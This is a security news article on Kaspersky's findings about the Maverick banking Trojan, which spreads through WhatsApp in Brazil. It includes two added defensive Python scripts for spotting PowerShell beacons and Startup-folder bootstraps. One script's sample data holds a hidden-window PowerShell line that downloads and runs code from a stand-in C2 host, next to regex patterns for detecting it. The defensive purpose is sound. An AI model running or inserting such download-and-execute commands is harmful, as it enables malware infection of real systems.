Researchers from Kaspersky’s Global Research and Analysis Team (GReAT) have uncovered a massive fileless malware campaign targeting users in Brazil, which distributes a new and highly sophisticated banking Trojan dubbed Maverick via WhatsApp messages. The operation, which leverages automation tools, AI-generated code, and advanced encryption, is being described by Kaspersky as “one of the most complex infection chains we have ever detected.”
According to Kaspersky, the campaign spreads through malicious ZIP files shared via WhatsApp, containing a malicious .LNK shortcut file. Unlike executable attachments, LNK files are not blocked by the messaging platform, allowing attackers to bypass filters.
“A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named ‘Maverick’ through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform,” the researchers wrote.
When opened, the LNK file launches a PowerShell script that connects to a command-and-control (C2) server to download the next infection stage. To prevent casual probing, the C2 validates each request by verifying the User-Agent string, rejecting unauthorized connections.

“The C2 also validates the ‘User-Agent’ of the HTTP request to ensure that it is coming from the PowerShell command. Without the correct User-Agent, the C2 returns an HTTP 401 code,” Kaspersky explained.
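The User-Agent gate cuts both ways for defenders: the stage-one script has to identify itself as PowerShell to be served, and the C2 answers everything else with a 401. As an added illustration (not code from Kaspersky's report), the script below hunts a proxy log for PowerShell user-agents to unfamiliar hosts and for hosts that serve PowerShell with 200 but reject other clients with 401. It assumes the default Invoke-WebRequest User-Agent format containing "PowerShell/<version>", a constructed tab-separated log layout, and an allowlist of hosts PowerShell is expected to contact.

```python
"""Spot PowerShell beacons and User-Agent-gated hosts in a proxy log (added example)."""
import csv
import io
from urllib.parse import urlsplit

# Hosts PowerShell contacts legitimately in most fleets (assumed allowlist, tune per site).
ALLOWED_HOSTS = {"www.powershellgallery.com", "update.microsoft.com"}

# Constructed sample log, not real telemetry. Fields: time, client, method, url, status, user_agent.
SAMPLE_LOG = (
    "2025-10-03T14:02:11Z\t10.0.5.23\tGET\thttps://www.powershellgallery.com/api/v2/\t200\t"
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; pt-BR) WindowsPowerShell/5.1.19041.1\n"
    "2025-10-03T14:02:40Z\t10.0.5.23\tGET\thttp://stage.example.invalid/next\t200\t"
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; pt-BR) WindowsPowerShell/5.1.19041.1\n"
    "2025-10-03T14:02:41Z\t10.0.5.99\tGET\thttp://stage.example.invalid/next\t401\tcurl/8.4.0\n"
    "2025-10-03T14:03:05Z\t10.0.5.42\tGET\thttps://www.example.com/\t200\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/118.0\n"
)

def is_powershell_ua(ua: str) -> bool:
    # Invoke-WebRequest advertises "WindowsPowerShell/5.x" (PS 5) or "PowerShell/7.x" (PS 7).
    return "PowerShell/" in ua

def _records(log_text: str):
    """Yield (client, host, status, user_agent); skip malformed lines instead of crashing."""
    for row in csv.reader(io.StringIO(log_text), delimiter="\t"):
        if len(row) == 6:
            _time, client, _method, url, status, ua = row
            yield client, urlsplit(url).hostname or "", status, ua

def find_powershell_beacons(log_text: str):
    """PowerShell requests to hosts outside the allowlist: candidate stage-one downloads."""
    return [(client, host, int(status)) for client, host, status, ua in _records(log_text)
            if is_powershell_ua(ua) and host not in ALLOWED_HOSTS]

def hosts_gating_on_user_agent(log_text: str):
    """Hosts that served PowerShell (200) but rejected other clients (401): the C2 gate."""
    served_ps, rejected_other = set(), set()
    for _client, host, status, ua in _records(log_text):
        if is_powershell_ua(ua) and status == "200":
            served_ps.add(host)
        elif not is_powershell_ua(ua) and status == "401":
            rejected_other.add(host)
    return sorted(served_ps & rejected_other)

if __name__ == "__main__":
    for hit in find_powershell_beacons(SAMPLE_LOG):
        print("PowerShell request to unexpected host:", hit)
    print("User-Agent-gated hosts:", hosts_gating_on_user_agent(SAMPLE_LOG))
```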
All stages of the infection chain occur entirely in memory, using PowerShell, .NET assemblies, and Donut shellcode, making the attack fully fileless and exceptionally stealthy.
The Maverick Trojan shares notable code similarities with Coyote, a Brazilian banking Trojan previously analyzed by Kaspersky in 2024, but researchers believe it represents a new generation of threats.
“The new Trojan features code similarities with another Brazilian banking Trojan called Coyote; however, we consider Maverick to be a new threat,” the report states.
Maverick performs environmental checks to ensure it only infects Brazilian users, verifying timezone, language, and region settings before proceeding.
“The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed,” Kaspersky noted.
One of Maverick’s most alarming features is its ability to self-propagate via WhatsApp Web. Once installed, the malware uses WPPConnect, an open-source WhatsApp automation project, to hijack victims’ sessions and automatically send malicious messages to all contacts.
“Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts,” the researchers explained.
This propagation method turns every infected user into a distribution node, creating a worm-like infection model capable of spreading exponentially.
The Maverick Trojan specifically monitors 26 Brazilian banking websites, 6 cryptocurrency exchanges, and 1 payment platform. It can execute a range of malicious actions once a victim visits one of these sites:
- Take screenshots
- Install a keylogger
- Control the mouse and keyboard
- Block the screen during banking sessions
- Inject phishing overlays to steal credentials
“The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay,” the report states.
Kaspersky analysts also found signs that parts of Maverick’s code, including its certificate decryption routines, were written with the help of artificial intelligence.
“The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development,” the researchers revealed.
Communication between infected machines and the C2 is protected using SSL tunnels and custom X.509 certificates, decrypted with the password “Maverick2025!”.
The Trojan also authenticates using a unique password — 101593a51d9c40fc8ec162d67504e221 — before it can receive commands such as SCREENSHOT, KEYLOGGER, or GENERATEWINDOWREQUEST, the last of which opens fake banking windows to harvest credentials.
Maverick uses an innovative persistence mechanism that relies entirely on the availability of its C2 server. Instead of leaving large traces on disk, it creates a small batch script in the Startup folder, which retrieves the main payload from the C2 each time the system boots.
“Saving only the bootstrap .bat file ensures that the entire infection remains in memory. If persistence is achieved, it will start its true function, which is mainly to monitor browsers to check if they open banking pages,” the report explains.
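Because the bootstrap batch file is the only artefact that touches disk, it is also the one place a host-side check can catch this persistence. The script below is an added example (not code from Kaspersky's report) that scans a Startup folder for .bat/.cmd files launching PowerShell with a hidden window and a download-and-run one-liner, and reports which indicators fired so an analyst can triage. It assumes the default per-user Startup path and uses constructed sample contents.

```python
"""Flag Startup-folder batch files shaped like a fileless bootstrap (added example)."""
import os
import re
from pathlib import Path

# (indicator name, regex); matching is case-insensitive.
INDICATORS = [
    ("launches PowerShell", re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.I)),
    ("hides its window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("fetches from network", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|https?://", re.I)),
    ("runs fetched content", re.compile(
        r"\biex\b|invoke-expression|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]
MIN_INDICATORS = 3  # PowerShell plus at least two of hidden/fetch/run is the bootstrap shape

# Constructed samples (not real malware): a benign launcher and a bootstrap-style script.
BENIGN_BAT = "@echo off\r\nstart \"\" \"C:\\Program Files\\Notes\\notes.exe\"\r\n"
BOOTSTRAP_BAT = ("@echo off\r\npowershell -nop -w hidden -c "
                 "\"iex ((New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage'))\"\r\n")

def matched_indicators(text: str):
    """Names of the indicators present in a script body, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def is_bootstrap(text: str) -> bool:
    hits = matched_indicators(text)
    return "launches PowerShell" in hits and len(hits) >= MIN_INDICATORS

def scan_startup(folder: Path):
    """Return {path: indicators} for every .bat/.cmd in folder that looks like a bootstrap."""
    findings = {}
    if not folder.is_dir():
        return findings
    for p in folder.iterdir():
        if p.is_file() and p.suffix.lower() in (".bat", ".cmd"):
            text = p.read_text(errors="replace")  # tolerate odd encodings in noisy files
            if is_bootstrap(text):
                findings[str(p)] = matched_indicators(text)
    return findings

if __name__ == "__main__":
    # Default per-user Startup folder on Windows (assumed location).
    startup = Path(os.environ.get("APPDATA", "")) / "Microsoft/Windows/Start Menu/Programs/Startup"
    for path, why in scan_startup(startup).items():
        print(path, "->", ", ".join(why))
```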
Kaspersky’s telemetry indicates that the campaign has already had a massive impact in Brazil: the company’s products blocked over 62,000 infection attempts in the first ten days of October 2025 alone.
“Our solutions have blocked 62 thousand infection attempts using the malicious LNK file in the first 10 days of October, only in Brazil,” the company said.
Although all known victims are in Brazil, researchers caution that the malware could easily spread abroad through WhatsApp’s global user base.
“All victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location,” Kaspersky warned.